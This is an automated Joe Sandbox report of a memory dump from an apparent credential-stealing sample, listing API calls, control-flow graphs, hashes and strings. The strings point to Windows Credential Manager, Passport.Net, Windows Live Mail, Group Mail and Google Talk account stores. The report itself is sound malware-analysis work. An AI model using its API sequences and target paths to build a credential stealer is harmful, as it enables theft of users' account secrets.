                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                            • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                            • API String ID: 2768085393-1693574875
                                                            • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                            • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                            • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                            • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 0044430B
                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                              • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                            • memset.MSVCRT ref: 00444379
                                                            • memset.MSVCRT ref: 00444394
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                            • strlen.MSVCRT ref: 004443DB
                                                            • _strcmpi.MSVCRT ref: 00444401
                                                            Strings
                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                            • Store Root, xrefs: 004443A5
                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                            • API String ID: 832325562-2578778931
                                                            • Opcode ID: 29f36c30459babb599eafc743357add432badc7eb4b16160b2380ad1a198b008
                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                            • Opcode Fuzzy Hash: 29f36c30459babb599eafc743357add432badc7eb4b16160b2380ad1a198b008
                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                            Control-flow Graph

                                                            control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                            APIs
                                                            • memset.MSVCRT ref: 0040F567
                                                            • memset.MSVCRT ref: 0040F57F
                                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                            • String ID:
                                                            • API String ID: 2012582556-3916222277
                                                            • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                            • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                            Control-flow Graph

                                                            control_flow_graph 331 4086e0-408704 call 4045db 334 4088f7-408906 call 404656 331->334 335 40870a-408716 331->335 337 408718-40872b CredEnumerateW 335->337 338 40872d-408731 335->338 337->338 338->334 341 408737-408764 wcslen 338->341 343 40876a 341->343 344 4088ef-4088f3 LocalFree 341->344 345 40876f-408774 343->345 344->334 345->344 346 40877a-40879e wcsncmp 345->346 347 4087a4-4087bb 346->347 348 4088dd-4088e9 346->348 347->347 349 4087bd-4087ee call 40466b call 404734 347->349 348->344 348->345 354 4088d1-4088d8 call 404785 349->354 355 4087f4-40880c call 4047a5 349->355 354->348 355->354 359 408812-408838 memset 355->359 360 40883a 359->360 361 40883c-4088a9 memcpy wcschr 359->361 360->361 362 4088b7-4088cb LocalFree 361->362 363 4088ab-4088b3 361->363 362->354 363->362
                                                            APIs
                                                              • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                            • wcslen.MSVCRT ref: 0040874A
                                                            • wcsncmp.MSVCRT ref: 00408794
                                                            • memset.MSVCRT ref: 0040882A
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                            • wcschr.MSVCRT ref: 0040889F
                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                            • LocalFree.KERNELBASE(?), ref: 004088F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$FreeLocal$LibraryLoadmemcpymemsetwcschrwcslenwcsncmp
                                                            • String ID: J$Microsoft_WinInet
                                                            • API String ID: 3950215071-260894208
                                                            • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                            • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                            • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                            • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A

                                                            Control-flow Graph

                                                            control_flow_graph 365 4037ca-40381c memset * 2 call 444551 368 4038e2-4038e5 365->368 369 403822-403882 call 4021b6 call 406f06 * 2 strchr 365->369 376 403884-403895 _mbscpy 369->376 377 403897-4038a2 strlen 369->377 378 4038bf-4038dd _mbscpy call 4023e5 376->378 377->378 379 4038a4-4038bc sprintf 377->379 378->368 379->378
                                                            APIs
                                                            • memset.MSVCRT ref: 004037EB
                                                            • memset.MSVCRT ref: 004037FF
                                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                              • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                            • strchr.MSVCRT ref: 0040386E
                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                            • strlen.MSVCRT ref: 00403897
                                                            • sprintf.MSVCRT ref: 004038B7
                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                            • String ID: %s@yahoo.com
                                                            • API String ID: 317221925-3288273942
                                                            • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                            • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                            • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                            • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                            Control-flow Graph

                                                            control_flow_graph 381 4034e4-403544 memset * 2 call 410b1e 384 403580-403582 381->384 385 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 381->385 385->384
                                                            APIs
                                                            • memset.MSVCRT ref: 00403504
                                                            • memset.MSVCRT ref: 0040351A
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                            • _mbscat.MSVCRT ref: 0040356D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscatmemset$Close_mbscpystrlen
                                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                                            • API String ID: 3071782539-966475738
                                                            • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                            • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                            Control-flow Graph

                                                            control_flow_graph 390 40f6e2-40f70a call 40466b call 4045db 395 40f710-40f717 call 404734 390->395 396 40f7e9-40f801 call 404656 call 404785 390->396 395->396 401 40f71d-40f72e CredReadA 395->401 401->396 403 40f734-40f73a 401->403 405 40f740-40f743 403->405 406 40f7e5 403->406 405->406 407 40f749-40f759 405->407 406->396 408 40f75a-40f770 407->408 408->408 409 40f772-40f795 call 4047a5 408->409 412 40f7e2 409->412 413 40f797-40f7b6 WideCharToMultiByte 409->413 412->406 414 40f7b8-40f7c6 strlen 413->414 415 40f7d9-40f7dc LocalFree 413->415 414->415 416 40f7c8-40f7d8 _mbscpy 414->416 415->412 416->415
                                                            APIs
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                            • strlen.MSVCRT ref: 0040F7BE
                                                            • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                            • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                            • String ID: Passport.Net\*
                                                            • API String ID: 4000595657-3671122194
                                                            • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                            • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                            • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                            • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

                                                            Control-flow Graph

                                                            control_flow_graph 417 40ccd7-40cd06 ??2@YAPAXI@Z 418 40cd08-40cd0d 417->418 419 40cd0f 417->419 420 40cd11-40cd24 ??2@YAPAXI@Z 418->420 419->420 421 40cd26-40cd2d call 404025 420->421 422 40cd2f 420->422 423 40cd31-40cd57 421->423 422->423 425 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 423->425 426 40cd59-40cd60 DeleteObject 423->426 426->425
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                            • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                            • DeleteObject.GDI32(?), ref: 0040CD5A
                                                            • memset.MSVCRT ref: 0040CD96
                                                            • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                            • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                            • String ID:
                                                            • API String ID: 2054149589-0
                                                            • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                            • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                            Control-flow Graph

                                                            control_flow_graph 434 44b40e-44b415 GetModuleHandleA 435 44b455 434->435 436 44b417-44b426 call 44b42b 434->436 438 44b457-44b45b 435->438 445 44b48d 436->445 446 44b428-44b433 GetProcAddress 436->446 440 44b45d-44b465 GetModuleHandleA 438->440 441 44b49a call 44b49f 438->441 444 44b467-44b46f 440->444 444->444 447 44b471-44b474 444->447 449 44b48e-44b496 445->449 446->435 450 44b435-44b442 VirtualProtect 446->450 447->438 448 44b476-44b478 447->448 451 44b47e-44b486 448->451 452 44b47a-44b47c 448->452 458 44b498 449->458 454 44b454 450->454 455 44b444-44b452 VirtualProtect 450->455 456 44b487-44b488 GetProcAddress 451->456 452->456 454->435 455->454 456->445 458->447
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                              • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                              • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                              • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            • memset.MSVCRT ref: 00408620
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • memset.MSVCRT ref: 00408671
                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                            • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                            Strings
                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                            • String ID: Software\Google\Google Talk\Accounts
                                                            • API String ID: 1366857005-1079885057
                                                            • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                            • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Cursor_mbsicmpqsort
                                                            • String ID: /nosort$/sort
                                                            • API String ID: 882979914-1578091866
                                                            • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                            • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                              • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                              • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                              • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                              • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                            • String ID:
                                                            • API String ID: 2152742572-0
                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                            APIs
                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75D50A60,?,00000000), ref: 00410D1C
